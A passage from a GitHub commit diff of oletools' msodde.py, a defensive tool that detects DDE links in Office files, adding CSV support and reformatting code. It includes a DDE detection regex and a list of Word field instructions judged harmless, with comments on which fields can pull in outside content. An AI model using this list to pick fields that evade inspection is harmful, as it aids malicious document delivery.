Commit 95ca88d297935a2de9175b92152713b64d3f6e6c
Committed by
GitHub
Merge pull request #241 from christian-intra2net/dde-in-csv
Dde in csv
Showing
7 changed files
with
472 additions
and
187 deletions
oletools/msodde.py
| @@ -9,6 +9,7 @@ Supported formats: | @@ -9,6 +9,7 @@ Supported formats: | ||
| 9 | - Word 97-2003 (.doc, .dot), Word 2007+ (.docx, .dotx, .docm, .dotm) | 9 | - Word 97-2003 (.doc, .dot), Word 2007+ (.docx, .dotx, .docm, .dotm) |
| 10 | - Excel 97-2003 (.xls), Excel 2007+ (.xlsx, .xlsm, .xlsb) | 10 | - Excel 97-2003 (.xls), Excel 2007+ (.xlsx, .xlsm, .xlsb) |
| 11 | - RTF | 11 | - RTF |
| 12 | +- CSV (exported from / imported into Excel) | ||
| 12 | 13 | ||
| 13 | Author: Philippe Lagadec - http://www.decalage.info | 14 | Author: Philippe Lagadec - http://www.decalage.info |
| 14 | License: BSD, see source code or documentation | 15 | License: BSD, see source code or documentation |
| @@ -17,39 +18,72 @@ msodde is part of the python-oletools package: | @@ -17,39 +18,72 @@ msodde is part of the python-oletools package: | ||
| 17 | http://www.decalage.info/python/oletools | 18 | http://www.decalage.info/python/oletools |
| 18 | """ | 19 | """ |
| 19 | 20 | ||
| 20 | -# === LICENSE ================================================================== | 21 | +# === LICENSE ================================================================= |
| 21 | 22 | ||
| 22 | # msodde is copyright (c) 2017 Philippe Lagadec (http://www.decalage.info) | 23 | # msodde is copyright (c) 2017 Philippe Lagadec (http://www.decalage.info) |
| 23 | # All rights reserved. | 24 | # All rights reserved. |
| 24 | # | 25 | # |
| 25 | -# Redistribution and use in source and binary forms, with or without modification, | ||
| 26 | -# are permitted provided that the following conditions are met: | 26 | +# Redistribution and use in source and binary forms, with or without |
| 27 | +# modification, are permitted provided that the following conditions are met: | ||
| 27 | # | 28 | # |
| 28 | -# * Redistributions of source code must retain the above copyright notice, this | ||
| 29 | -# list of conditions and the following disclaimer. | 29 | +# * Redistributions of source code must retain the above copyright notice, |
| 30 | +# this list of conditions and the following disclaimer. | ||
| 30 | # * Redistributions in binary form must reproduce the above copyright notice, | 31 | # * Redistributions in binary form must reproduce the above copyright notice, |
| 31 | # this list of conditions and the following disclaimer in the documentation | 32 | # this list of conditions and the following disclaimer in the documentation |
| 32 | # and/or other materials provided with the distribution. | 33 | # and/or other materials provided with the distribution. |
| 33 | # | 34 | # |
| 34 | -# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND | ||
| 35 | -# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED | ||
| 36 | -# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE | ||
| 37 | -# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE | ||
| 38 | -# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL | ||
| 39 | -# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR | ||
| 40 | -# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER | ||
| 41 | -# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, | ||
| 42 | -# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE | ||
| 43 | -# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. | 35 | +# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" |
| 36 | +# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE | ||
| 37 | +# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE | ||
| 38 | +# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE | ||
| 39 | +# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR | ||
| 40 | +# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF | ||
| 41 | +# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS | ||
| 42 | +# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN | ||
| 43 | +# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) | ||
| 44 | +# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE | ||
| 45 | +# POSSIBILITY OF SUCH DAMAGE. | ||
| 46 | + | ||
| 47 | +# -- IMPORTS ------------------------------------------------------------------ | ||
| 44 | 48 | ||
| 45 | from __future__ import print_function | 49 | from __future__ import print_function |
| 46 | 50 | ||
| 47 | -#------------------------------------------------------------------------------ | 51 | +import argparse |
| 52 | +import zipfile | ||
| 53 | +import os | ||
| 54 | +from os.path import abspath, dirname | ||
| 55 | +import sys | ||
| 56 | +import json | ||
| 57 | +import logging | ||
| 58 | +import re | ||
| 59 | +import csv | ||
| 60 | + | ||
| 61 | +# import lxml or ElementTree for XML parsing: | ||
| 62 | +try: | ||
| 63 | + # lxml: best performance for XML processing | ||
| 64 | + import lxml.etree as ET | ||
| 65 | +except ImportError: | ||
| 66 | + import xml.etree.cElementTree as ET | ||
| 67 | + | ||
| 68 | +# little hack to allow absolute imports even if oletools is not installed | ||
| 69 | +# Copied from olevba.py | ||
| 70 | +PARENT_DIR = dirname(dirname(abspath(__file__))) | ||
| 71 | +if PARENT_DIR not in sys.path: | ||
| 72 | + sys.path.insert(0, PARENT_DIR) | ||
| 73 | +del PARENT_DIR | ||
| 74 | + | ||
| 75 | +from oletools.thirdparty import olefile | ||
| 76 | +from oletools import ooxml | ||
| 77 | +from oletools import xls_parser | ||
| 78 | +from oletools import rtfobj | ||
| 79 | + | ||
| 80 | +# ----------------------------------------------------------------------------- | ||
| 48 | # CHANGELOG: | 81 | # CHANGELOG: |
| 49 | # 2017-10-18 v0.52 PL: - first version | 82 | # 2017-10-18 v0.52 PL: - first version |
| 50 | # 2017-10-20 PL: - fixed issue #202 (handling empty xml tags) | 83 | # 2017-10-20 PL: - fixed issue #202 (handling empty xml tags) |
| 51 | # 2017-10-23 ES: - add check for fldSimple codes | 84 | # 2017-10-23 ES: - add check for fldSimple codes |
| 52 | -# 2017-10-24 ES: - group tags and track begin/end tags to keep DDE strings together | 85 | +# 2017-10-24 ES: - group tags and track begin/end tags to keep DDE |
| 86 | +# strings together | ||
| 53 | # 2017-10-25 CH: - add json output | 87 | # 2017-10-25 CH: - add json output |
| 54 | # 2017-10-25 CH: - parse doc | 88 | # 2017-10-25 CH: - parse doc |
| 55 | # PL: - added logging | 89 | # PL: - added logging |
| @@ -59,10 +93,11 @@ from __future__ import print_function | @@ -59,10 +93,11 @@ from __future__ import print_function | ||
| 59 | # 2017-11-29 CH: - added support for xlsb files | 93 | # 2017-11-29 CH: - added support for xlsb files |
| 60 | # 2017-11-29 PL: - added support for RTF files (issue #223) | 94 | # 2017-11-29 PL: - added support for RTF files (issue #223) |
| 61 | # 2017-12-07 CH: - ensure rtf file is closed | 95 | # 2017-12-07 CH: - ensure rtf file is closed |
| 96 | +# 2018-01-05 CH: - add CSV | ||
| 62 | 97 | ||
| 63 | -__version__ = '0.52dev9' | 98 | +__version__ = '0.52dev10' |
| 64 | 99 | ||
| 65 | -#------------------------------------------------------------------------------ | 100 | +# ----------------------------------------------------------------------------- |
| 66 | # TODO: field codes can be in headers/footers/comments - parse these | 101 | # TODO: field codes can be in headers/footers/comments - parse these |
| 67 | # TODO: generalize behaviour for xlsx: find all external links (maybe rename | 102 | # TODO: generalize behaviour for xlsx: find all external links (maybe rename |
| 68 | # command line flag for "blacklist" to "find all suspicious" or so) | 103 | # command line flag for "blacklist" to "find all suspicious" or so) |
| @@ -71,40 +106,10 @@ __version__ = '0.52dev9' | @@ -71,40 +106,10 @@ __version__ = '0.52dev9' | ||
| 71 | # DDE-Links | 106 | # DDE-Links |
| 72 | # TODO: avoid reading complete rtf file data into memory | 107 | # TODO: avoid reading complete rtf file data into memory |
| 73 | 108 | ||
| 74 | -#------------------------------------------------------------------------------ | 109 | +# ----------------------------------------------------------------------------- |
| 75 | # REFERENCES: | 110 | # REFERENCES: |
| 76 | 111 | ||
| 77 | 112 | ||
| 78 | -#--- IMPORTS ------------------------------------------------------------------ | ||
| 79 | - | ||
| 80 | -import argparse | ||
| 81 | -import zipfile | ||
| 82 | -import os | ||
| 83 | -import sys | ||
| 84 | -import json | ||
| 85 | -import logging | ||
| 86 | -import re | ||
| 87 | -from struct import unpack | ||
| 88 | - | ||
| 89 | -# import lxml or ElementTree for XML parsing: | ||
| 90 | -try: | ||
| 91 | - # lxml: best performance for XML processing | ||
| 92 | - import lxml.etree as ET | ||
| 93 | -except ImportError: | ||
| 94 | - import xml.etree.cElementTree as ET | ||
| 95 | - | ||
| 96 | -# little hack to allow absolute imports even if oletools is not installed | ||
| 97 | -# Copied from olevba.py | ||
| 98 | -_thismodule_dir = os.path.normpath(os.path.abspath(os.path.dirname(__file__))) | ||
| 99 | -_parent_dir = os.path.normpath(os.path.join(_thismodule_dir, '..')) | ||
| 100 | -if not _parent_dir in sys.path: | ||
| 101 | - sys.path.insert(0, _parent_dir) | ||
| 102 | - | ||
| 103 | -from oletools.thirdparty import olefile | ||
| 104 | -from oletools import ooxml | ||
| 105 | -from oletools import xls_parser | ||
| 106 | -from oletools import rtfobj | ||
| 107 | - | ||
| 108 | # === PYTHON 2+3 SUPPORT ====================================================== | 113 | # === PYTHON 2+3 SUPPORT ====================================================== |
| 109 | 114 | ||
| 110 | if sys.version_info[0] >= 3: | 115 | if sys.version_info[0] >= 3: |
| @@ -123,7 +128,9 @@ TAG_W_P = "{%s}p" % NS_WORD | @@ -123,7 +128,9 @@ TAG_W_P = "{%s}p" % NS_WORD | ||
| 123 | TAG_W_R = "{%s}r" % NS_WORD | 128 | TAG_W_R = "{%s}r" % NS_WORD |
| 124 | ATTR_W_INSTR = '{%s}instr' % NS_WORD | 129 | ATTR_W_INSTR = '{%s}instr' % NS_WORD |
| 125 | ATTR_W_FLDCHARTYPE = '{%s}fldCharType' % NS_WORD | 130 | ATTR_W_FLDCHARTYPE = '{%s}fldCharType' % NS_WORD |
| 126 | -LOCATIONS = ['word/document.xml','word/endnotes.xml','word/footnotes.xml','word/header1.xml','word/footer1.xml','word/header2.xml','word/footer2.xml','word/comments.xml'] | 131 | +LOCATIONS = ('word/document.xml', 'word/endnotes.xml', 'word/footnotes.xml', |
| 132 | + 'word/header1.xml', 'word/footer1.xml', 'word/header2.xml', | ||
| 133 | + 'word/footer2.xml', 'word/comments.xml') | ||
| 127 | 134 | ||
| 128 | # list of acceptable, harmless field instructions for blacklist field mode | 135 | # list of acceptable, harmless field instructions for blacklist field mode |
| 129 | # c.f. http://officeopenxml.com/WPfieldInstructions.php or the official | 136 | # c.f. http://officeopenxml.com/WPfieldInstructions.php or the official |
| @@ -133,73 +140,74 @@ LOCATIONS = ['word/document.xml','word/endnotes.xml','word/footnotes.xml','word/ | @@ -133,73 +140,74 @@ LOCATIONS = ['word/document.xml','word/endnotes.xml','word/footnotes.xml','word/ | ||
| 133 | # switches_with_args, switches_without_args, format_switches) | 140 | # switches_with_args, switches_without_args, format_switches) |
| 134 | FIELD_BLACKLIST = ( | 141 | FIELD_BLACKLIST = ( |
| 135 | # date and time: | 142 | # date and time: |
| 136 | - ('CREATEDATE', 0, 0, '', 'hs', 'datetime'), | ||
| 137 | - ('DATE', 0, 0, '', 'hls', 'datetime'), | ||
| 138 | - ('EDITTIME', 0, 0, '', '', 'numeric'), | ||
| 139 | - ('PRINTDATE', 0, 0, '', 'hs', 'datetime'), | ||
| 140 | - ('SAVEDATE', 0, 0, '', 'hs', 'datetime'), | ||
| 141 | - ('TIME', 0, 0, '', '', 'datetime'), | 143 | + ('CREATEDATE', 0, 0, '', 'hs', 'datetime'), # pylint: disable=bad-whitespace |
| 144 | + ('DATE', 0, 0, '', 'hls', 'datetime'), # pylint: disable=bad-whitespace | ||
| 145 | + ('EDITTIME', 0, 0, '', '', 'numeric'), # pylint: disable=bad-whitespace | ||
| 146 | + ('PRINTDATE', 0, 0, '', 'hs', 'datetime'), # pylint: disable=bad-whitespace | ||
| 147 | + ('SAVEDATE', 0, 0, '', 'hs', 'datetime'), # pylint: disable=bad-whitespace | ||
| 148 | + ('TIME', 0, 0, '', '', 'datetime'), # pylint: disable=bad-whitespace | ||
| 142 | # exclude document automation (we hate the "auto" in "automation") | 149 | # exclude document automation (we hate the "auto" in "automation") |
| 143 | # (COMPARE, DOCVARIABLE, GOTOBUTTON, IF, MACROBUTTON, PRINT) | 150 | # (COMPARE, DOCVARIABLE, GOTOBUTTON, IF, MACROBUTTON, PRINT) |
| 144 | # document information | 151 | # document information |
| 145 | - ('AUTHOR', 0, 1, '', '', 'string'), | ||
| 146 | - ('COMMENTS', 0, 1, '', '', 'string'), | ||
| 147 | - ('DOCPROPERTY', 1, 0, '', '', 'string/numeric/datetime'), | ||
| 148 | - ('FILENAME', 0, 0, '', 'p', 'string'), | ||
| 149 | - ('FILESIZE', 0, 0, '', 'km', 'numeric'), | ||
| 150 | - ('KEYWORDS', 0, 1, '', '', 'string'), | ||
| 151 | - ('LASTSAVEDBY', 0, 0, '', '', 'string'), | ||
| 152 | - ('NUMCHARS', 0, 0, '', '', 'numeric'), | ||
| 153 | - ('NUMPAGES', 0, 0, '', '', 'numeric'), | ||
| 154 | - ('NUMWORDS', 0, 0, '', '', 'numeric'), | ||
| 155 | - ('SUBJECT', 0, 1, '', '', 'string'), | ||
| 156 | - ('TEMPLATE', 0, 0, '', 'p', 'string'), | ||
| 157 | - ('TITLE', 0, 1, '', '', 'string'), | 152 | + ('AUTHOR', 0, 1, '', '', 'string'), # pylint: disable=bad-whitespace |
| 153 | + ('COMMENTS', 0, 1, '', '', 'string'), # pylint: disable=bad-whitespace | ||
| 154 | + ('DOCPROPERTY', 1, 0, '', '', 'string/numeric/datetime'), # pylint: disable=bad-whitespace | ||
| 155 | + ('FILENAME', 0, 0, '', 'p', 'string'), # pylint: disable=bad-whitespace | ||
| 156 | + ('FILESIZE', 0, 0, '', 'km', 'numeric'), # pylint: disable=bad-whitespace | ||
| 157 | + ('KEYWORDS', 0, 1, '', '', 'string'), # pylint: disable=bad-whitespace | ||
| 158 | + ('LASTSAVEDBY', 0, 0, '', '', 'string'), # pylint: disable=bad-whitespace | ||
| 159 | + ('NUMCHARS', 0, 0, '', '', 'numeric'), # pylint: disable=bad-whitespace | ||
| 160 | + ('NUMPAGES', 0, 0, '', '', 'numeric'), # pylint: disable=bad-whitespace | ||
| 161 | + ('NUMWORDS', 0, 0, '', '', 'numeric'), # pylint: disable=bad-whitespace | ||
| 162 | + ('SUBJECT', 0, 1, '', '', 'string'), # pylint: disable=bad-whitespace | ||
| 163 | + ('TEMPLATE', 0, 0, '', 'p', 'string'), # pylint: disable=bad-whitespace | ||
| 164 | + ('TITLE', 0, 1, '', '', 'string'), # pylint: disable=bad-whitespace | ||
| 158 | # equations and formulas | 165 | # equations and formulas |
| 159 | - # exlude '=' formulae because they have different syntax | ||
| 160 | - ('ADVANCE', 0, 0, 'dlruxy', '', ''), | ||
| 161 | - ('SYMBOL', 1, 0, 'fs', 'ahju', ''), | 166 | + # exlude '=' formulae because they have different syntax (and can be bad) |
| 167 | + ('ADVANCE', 0, 0, 'dlruxy', '', ''), # pylint: disable=bad-whitespace | ||
| 168 | + ('SYMBOL', 1, 0, 'fs', 'ahju', ''), # pylint: disable=bad-whitespace | ||
| 162 | # form fields | 169 | # form fields |
| 163 | - ('FORMCHECKBOX', 0, 0, '', '', ''), | ||
| 164 | - ('FORMDROPDOWN', 0, 0, '', '', ''), | ||
| 165 | - ('FORMTEXT', 0, 0, '', '', ''), | 170 | + ('FORMCHECKBOX', 0, 0, '', '', ''), # pylint: disable=bad-whitespace |
| 171 | + ('FORMDROPDOWN', 0, 0, '', '', ''), # pylint: disable=bad-whitespace | ||
| 172 | + ('FORMTEXT', 0, 0, '', '', ''), # pylint: disable=bad-whitespace | ||
| 166 | # index and tables | 173 | # index and tables |
| 167 | - ('INDEX', 0, 0, 'bcdefghklpsz', 'ry', ''), | 174 | + ('INDEX', 0, 0, 'bcdefghklpsz', 'ry', ''), # pylint: disable=bad-whitespace |
| 168 | # exlude RD since that imports data from other files | 175 | # exlude RD since that imports data from other files |
| 169 | - ('TA', 0, 0, 'clrs', 'bi', ''), | ||
| 170 | - ('TC', 1, 0, 'fl', 'n', ''), | ||
| 171 | - ('TOA', 0, 0, 'bcdegls', 'fhp', ''), | ||
| 172 | - ('TOC', 0, 0, 'abcdflnopst', 'huwxz', ''), | ||
| 173 | - ('XE', 1, 0, 'frty', 'bi', ''), | 176 | + ('TA', 0, 0, 'clrs', 'bi', ''), # pylint: disable=bad-whitespace |
| 177 | + ('TC', 1, 0, 'fl', 'n', ''), # pylint: disable=bad-whitespace | ||
| 178 | + ('TOA', 0, 0, 'bcdegls', 'fhp', ''), # pylint: disable=bad-whitespace | ||
| 179 | + ('TOC', 0, 0, 'abcdflnopst', 'huwxz', ''), # pylint: disable=bad-whitespace | ||
| 180 | + ('XE', 1, 0, 'frty', 'bi', ''), # pylint: disable=bad-whitespace | ||
| 174 | # links and references | 181 | # links and references |
| 175 | # exclude AUTOTEXT and AUTOTEXTLIST since we do not like stuff with 'AUTO' | 182 | # exclude AUTOTEXT and AUTOTEXTLIST since we do not like stuff with 'AUTO' |
| 176 | - ('BIBLIOGRAPHY', 0, 0, 'lfm', '', ''), | ||
| 177 | - ('CITATION', 1, 0, 'lfspvm', 'nty', ''), | 183 | + ('BIBLIOGRAPHY', 0, 0, 'lfm', '', ''), # pylint: disable=bad-whitespace |
| 184 | + ('CITATION', 1, 0, 'lfspvm', 'nty', ''), # pylint: disable=bad-whitespace | ||
| 178 | # exclude HYPERLINK since we are allergic to URLs | 185 | # exclude HYPERLINK since we are allergic to URLs |
| 179 | # exclude INCLUDEPICTURE and INCLUDETEXT (other file or maybe even URL?) | 186 | # exclude INCLUDEPICTURE and INCLUDETEXT (other file or maybe even URL?) |
| 180 | # exclude LINK and REF (could reference other files) | 187 | # exclude LINK and REF (could reference other files) |
| 181 | - ('NOTEREF', 1, 0, '', 'fhp', ''), | ||
| 182 | - ('PAGEREF', 1, 0, '', 'hp', ''), | ||
| 183 | - ('QUOTE', 1, 0, '', '', 'datetime'), | ||
| 184 | - ('STYLEREF', 1, 0, '', 'lnprtw', ''), | 188 | + ('NOTEREF', 1, 0, '', 'fhp', ''), # pylint: disable=bad-whitespace |
| 189 | + ('PAGEREF', 1, 0, '', 'hp', ''), # pylint: disable=bad-whitespace | ||
| 190 | + ('QUOTE', 1, 0, '', '', 'datetime'), # pylint: disable=bad-whitespace | ||
| 191 | + ('STYLEREF', 1, 0, '', 'lnprtw', ''), # pylint: disable=bad-whitespace | ||
| 185 | # exclude all Mail Merge commands since they import data from other files | 192 | # exclude all Mail Merge commands since they import data from other files |
| 186 | # (ADDRESSBLOCK, ASK, COMPARE, DATABASE, FILLIN, GREETINGLINE, IF, | 193 | # (ADDRESSBLOCK, ASK, COMPARE, DATABASE, FILLIN, GREETINGLINE, IF, |
| 187 | # MERGEFIELD, MERGEREC, MERGESEQ, NEXT, NEXTIF, SET, SKIPIF) | 194 | # MERGEFIELD, MERGEREC, MERGESEQ, NEXT, NEXTIF, SET, SKIPIF) |
| 188 | # Numbering | 195 | # Numbering |
| 189 | - ('LISTNUM', 0, 1, 'ls', '', ''), | ||
| 190 | - ('PAGE', 0, 0, '', '', 'numeric'), | ||
| 191 | - ('REVNUM', 0, 0, '', '', ''), | ||
| 192 | - ('SECTION', 0, 0, '', '', 'numeric'), | ||
| 193 | - ('SECTIONPAGES', 0, 0, '', '', 'numeric'), | ||
| 194 | - ('SEQ', 1, 1, 'rs', 'chn', 'numeric'), | ||
| 195 | - # user information | ||
| 196 | - ('USERADDRESS', 0, 1, '', '', 'string'), | ||
| 197 | - ('USERINITIALS', 0, 1, '', '', 'string'), | ||
| 198 | - ('USERNAME', 0, 1, '', '', 'string'), | 196 | + ('LISTNUM', 0, 1, 'ls', '', ''), # pylint: disable=bad-whitespace |
| 197 | + ('PAGE', 0, 0, '', '', 'numeric'), # pylint: disable=bad-whitespace | ||
| 198 | + ('REVNUM', 0, 0, '', '', ''), # pylint: disable=bad-whitespace | ||
| 199 | + ('SECTION', 0, 0, '', '', 'numeric'), # pylint: disable=bad-whitespace | ||
| 200 | + ('SECTIONPAGES', 0, 0, '', '', 'numeric'), # pylint: disable=bad-whitespace | ||
| 201 | + ('SEQ', 1, 1, 'rs', 'chn', 'numeric'), # pylint: disable=bad-whitespace | ||
| 202 | + # user information # pylint: disable=bad-whitespace | ||
| 203 | + ('USERADDRESS', 0, 1, '', '', 'string'), # pylint: disable=bad-whitespace | ||
| 204 | + ('USERINITIALS', 0, 1, '', '', 'string'), # pylint: disable=bad-whitespace | ||
| 205 | + ('USERNAME', 0, 1, '', '', 'string'), # pylint: disable=bad-whitespace | ||
| 199 | ) | 206 | ) |
| 200 | 207 | ||
| 201 | FIELD_DDE_REGEX = re.compile(r'^\s*dde(auto)?\s+', re.I) | 208 | FIELD_DDE_REGEX = re.compile(r'^\s*dde(auto)?\s+', re.I) |
| 202 | 209 | ||
| 210 | +# filter modes | ||
| 203 | FIELD_FILTER_DDE = 'only dde' | 211 | FIELD_FILTER_DDE = 'only dde' |
| 204 | FIELD_FILTER_BLACKLIST = 'exclude blacklisted' | 212 | FIELD_FILTER_BLACKLIST = 'exclude blacklisted' |
| 205 | FIELD_FILTER_ALL = 'keep all' | 213 | FIELD_FILTER_ALL = 'keep all' |
| @@ -229,6 +237,7 @@ LOG_LEVELS = { | @@ -229,6 +237,7 @@ LOG_LEVELS = { | ||
| 229 | 'critical': logging.CRITICAL | 237 | 'critical': logging.CRITICAL |
| 230 | } | 238 | } |
| 231 | 239 | ||
| 240 | + | ||
| 232 | class NullHandler(logging.Handler): | 241 | class NullHandler(logging.Handler): |
| 233 | """ | 242 | """ |
| 234 | Log Handler without output, to avoid printing messages if logging is not | 243 | Log Handler without output, to avoid printing messages if logging is not |
| @@ -239,6 +248,7 @@ class NullHandler(logging.Handler): | @@ -239,6 +248,7 @@ class NullHandler(logging.Handler): | ||
| 239 | def emit(self, record): | 248 | def emit(self, record): |
| 240 | pass | 249 | pass |
| 241 | 250 | ||
| 251 | + | ||
| 242 | def get_logger(name, level=logging.CRITICAL+1): | 252 | def get_logger(name, level=logging.CRITICAL+1): |
| 243 | """ | 253 | """ |
| 244 | Create a suitable logger object for this module. | 254 | Create a suitable logger object for this module. |
| @@ -251,7 +261,7 @@ def get_logger(name, level=logging.CRITICAL+1): | @@ -251,7 +261,7 @@ def get_logger(name, level=logging.CRITICAL+1): | ||
| 251 | # First, test if there is already a logger with the same name, else it | 261 | # First, test if there is already a logger with the same name, else it |
| 252 | # will generate duplicate messages (due to duplicate handlers): | 262 | # will generate duplicate messages (due to duplicate handlers): |
| 253 | if name in logging.Logger.manager.loggerDict: | 263 | if name in logging.Logger.manager.loggerDict: |
| 254 | - #NOTE: another less intrusive but more "hackish" solution would be to | 264 | + # NOTE: another less intrusive but more "hackish" solution would be to |
| 255 | # use getLogger then test if its effective level is not default. | 265 | # use getLogger then test if its effective level is not default. |
| 256 | logger = logging.getLogger(name) | 266 | logger = logging.getLogger(name) |
| 257 | # make sure level is OK: | 267 | # make sure level is OK: |
| @@ -292,8 +302,8 @@ def ensure_stdout_handles_unicode(): | @@ -292,8 +302,8 @@ def ensure_stdout_handles_unicode(): | ||
| 292 | # try to find encoding for sys.stdout | 302 | # try to find encoding for sys.stdout |
| 293 | encoding = None | 303 | encoding = None |
| 294 | try: | 304 | try: |
| 295 | - encoding = sys.stdout.encoding # variable encoding might not exist | ||
| 296 | - except Exception: | 305 | + encoding = sys.stdout.encoding |
| 306 | + except AttributeError: # variable "encoding" might not exist | ||
| 297 | pass | 307 | pass |
| 298 | 308 | ||
| 299 | if encoding not in (None, '', 'ascii'): | 309 | if encoding not in (None, '', 'ascii'): |
| @@ -316,7 +326,8 @@ def ensure_stdout_handles_unicode(): | @@ -316,7 +326,8 @@ def ensure_stdout_handles_unicode(): | ||
| 316 | sys.stdout = wrapper(sys.stdout) | 326 | sys.stdout = wrapper(sys.stdout) |
| 317 | 327 | ||
| 318 | 328 | ||
| 319 | -ensure_stdout_handles_unicode() # e.g. for print(text) in main() | 329 | +if sys.version_info.major < 3: |
| 330 | + ensure_stdout_handles_unicode() # e.g. for print(text) in main() | ||
| 320 | 331 | ||
| 321 | 332 | ||
| 322 | # === ARGUMENT PARSING ======================================================= | 333 | # === ARGUMENT PARSING ======================================================= |
| @@ -338,28 +349,34 @@ def existing_file(filename): | @@ -338,28 +349,34 @@ def existing_file(filename): | ||
| 338 | 349 | ||
| 339 | def process_args(cmd_line_args=None): | 350 | def process_args(cmd_line_args=None): |
| 340 | """ parse command line arguments (given ones or per default sys.argv) """ | 351 | """ parse command line arguments (given ones or per default sys.argv) """ |
| 341 | - parser = ArgParserWithBanner(description='A python tool to detect and extract DDE links in MS Office files') | 352 | + parser = ArgParserWithBanner(description='A python tool to detect and ' |
| 353 | + 'extract DDE links in MS Office files') | ||
| 342 | parser.add_argument("filepath", help="path of the file to be analyzed", | 354 | parser.add_argument("filepath", help="path of the file to be analyzed", |
| 343 | type=existing_file, metavar='FILE') | 355 | type=existing_file, metavar='FILE') |
| 344 | parser.add_argument('-j', "--json", action='store_true', | 356 | parser.add_argument('-j', "--json", action='store_true', |
| 345 | help="Output in json format. Do not use with -ldebug") | 357 | help="Output in json format. Do not use with -ldebug") |
| 346 | - parser.add_argument("--nounquote", help="don't unquote values",action='store_true') | ||
| 347 | - parser.add_argument('-l', '--loglevel', dest="loglevel", action="store", default=DEFAULT_LOG_LEVEL, | ||
| 348 | - help="logging level debug/info/warning/error/critical (default=%(default)s)") | 358 | + parser.add_argument("--nounquote", help="don't unquote values", |
| 359 | + action='store_true') | ||
| 360 | + parser.add_argument('-l', '--loglevel', dest="loglevel", action="store", | ||
| 361 | + default=DEFAULT_LOG_LEVEL, | ||
| 362 | + help="logging level debug/info/warning/error/critical " | ||
| 363 | + "(default=%(default)s)") | ||
| 349 | filter_group = parser.add_argument_group( | 364 | filter_group = parser.add_argument_group( |
| 350 | - title='Filter which OpenXML field commands are returned', | ||
| 351 | - description='Only applies to OpenXML (e.g. docx) and rtf, not to OLE ' | ||
| 352 | - '(e.g. .doc). These options are mutually exclusive, last ' | ||
| 353 | - 'option found on command line overwrites earlier ones.') | 365 | + title='Filter which OpenXML field commands are returned', |
| 366 | + description='Only applies to OpenXML (e.g. docx) and rtf, not to OLE ' | ||
| 367 | + '(e.g. .doc). These options are mutually exclusive, last ' | ||
| 368 | + 'option found on command line overwrites earlier ones.') | ||
| 354 | filter_group.add_argument('-d', '--dde-only', action='store_const', | 369 | filter_group.add_argument('-d', '--dde-only', action='store_const', |
| 355 | dest='field_filter_mode', const=FIELD_FILTER_DDE, | 370 | dest='field_filter_mode', const=FIELD_FILTER_DDE, |
| 356 | help='Return only DDE and DDEAUTO fields') | 371 | help='Return only DDE and DDEAUTO fields') |
| 357 | filter_group.add_argument('-f', '--filter', action='store_const', | 372 | filter_group.add_argument('-f', '--filter', action='store_const', |
| 358 | - dest='field_filter_mode', const=FIELD_FILTER_BLACKLIST, | ||
| 359 | - help='Return all fields except harmless ones like PAGE') | 373 | + dest='field_filter_mode', |
| 374 | + const=FIELD_FILTER_BLACKLIST, | ||
| 375 | + help='Return all fields except harmless ones') | ||
| 360 | filter_group.add_argument('-a', '--all-fields', action='store_const', | 376 | filter_group.add_argument('-a', '--all-fields', action='store_const', |
| 361 | dest='field_filter_mode', const=FIELD_FILTER_ALL, | 377 | dest='field_filter_mode', const=FIELD_FILTER_ALL, |
| 362 | - help='Return all fields, irrespective of their contents') | 378 | + help='Return all fields, irrespective of their ' |
| 379 | + 'contents') | ||
| 363 | parser.set_defaults(field_filter_mode=FIELD_FILTER_DEFAULT) | 380 | parser.set_defaults(field_filter_mode=FIELD_FILTER_DEFAULT) |
| 364 | 381 | ||
| 365 | return parser.parse_args(cmd_line_args) | 382 | return parser.parse_args(cmd_line_args) |
| @@ -368,16 +385,19 @@ def process_args(cmd_line_args=None): | @@ -368,16 +385,19 @@ def process_args(cmd_line_args=None): | ||
| 368 | # === FUNCTIONS ============================================================== | 385 | # === FUNCTIONS ============================================================== |
| 369 | 386 | ||
| 370 | # from [MS-DOC], section 2.8.25 (PlcFld): | 387 | # from [MS-DOC], section 2.8.25 (PlcFld): |
| 371 | -# A field consists of two parts: field instructions and, optionally, a result. All fields MUST begin with | ||
| 372 | -# Unicode character 0x0013 with sprmCFSpec applied with a value of 1. This is the field begin | ||
| 373 | -# character. All fields MUST end with a Unicode character 0x0015 with sprmCFSpec applied with a value | ||
| 374 | -# of 1. This is the field end character. If the field has a result, then there MUST be a Unicode character | ||
| 375 | -# 0x0014 with sprmCFSpec applied with a value of 1 somewhere between the field begin character and | ||
| 376 | -# the field end character. This is the field separator. The field result is the content between the field | ||
| 377 | -# separator and the field end character. The field instructions are the content between the field begin | ||
| 378 | -# character and the field separator, if one is present, or between the field begin character and the field | ||
